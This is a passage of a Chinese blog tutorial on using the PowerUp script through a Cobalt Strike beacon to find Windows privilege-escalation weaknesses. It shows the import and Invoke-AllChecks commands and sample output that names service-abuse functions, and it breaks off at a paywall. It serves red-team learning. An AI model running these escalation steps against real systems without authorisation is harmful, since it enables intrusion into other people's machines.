【CS学习笔记】14、powerup提权的方法

最新推荐文章于 2025-03-02 19:25:43 发布

TeamsSix

最新推荐文章于 2025-03-02 19:25:43 发布

阅读量1.9k

点赞数 1

分类专栏：学习笔记 CS 学习笔记文章标签： Cobalt Strike 红队学习笔记

本文链接：https://blog.youkuaiyun.com/qq_37683287/article/details/107550139

版权

本文介绍了PowerUp工具在提权过程中的使用，包括如何导入和执行ps1文件以检测系统弱点，以及如何利用Mimikatz获取凭证和哈希。虽然在作者的环境中未能成功提权，但分享了相关命令和操作步骤，提供了获取Windows系统敏感信息的方法。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x00 介绍

PowerUp 所做的事是寻找可能存在弱点的地方，从而帮助提权。

利用 PowerUp 进行提权需要首先导入 ps1 文件powershell-import PowerUp.ps1，再执行powershell Invoke-AllChecks命令，使用 PowerUp 脚本可以快速的帮助我们发现系统弱点，从而实现提权的目的。

其中PowerUp.ps1文件可从这里下载：https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

0x01 PowerUp 的使用

执行以下命令：将 ps1 文件上传到目标主机，并执行所有弱点检查。

powershell-import PowerUp.ps1
powershell invoke-allchecks

详细运行过程：

beacon> powershell-import PowerUp.ps1
[*] Tasked beacon to import: PowerUp.ps1
[+] host called home, sent: 275084 bytes

beacon> powershell invoke-allchecks
[*] Tasked beacon to run: invoke-allchecks
[+] host called home, sent: 313 bytes
[+] received output:
[*] Running Invoke-AllChecks
[+] Current user already has local administrative privileges!
[*] Checking for unquoted service paths...

[*] Checking service executable and argument permissions...
[+] received output:
ServiceName                     : AeLookupSvc
Path                            : C:\Windows\system32\svchost.exe -k netsvcs
ModifiableFile                  : C:\Windows\system32
ModifiableFilePermissions       : GenericAll
ModifiableFileIdentityReference : BUILTIN\Administrators
StartName                       : localSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AeLookupSvc'
CanRestart                      : True
……内容太多，此处省略……

[*] Checking service permissions...
[+] received output:
ServiceName   : AeLookupSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs
StartName     : localSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AeLookupSvc'
CanRestart    : True
……内容太多，此处省略……

[*] Checki

最低0.47元/天解锁文章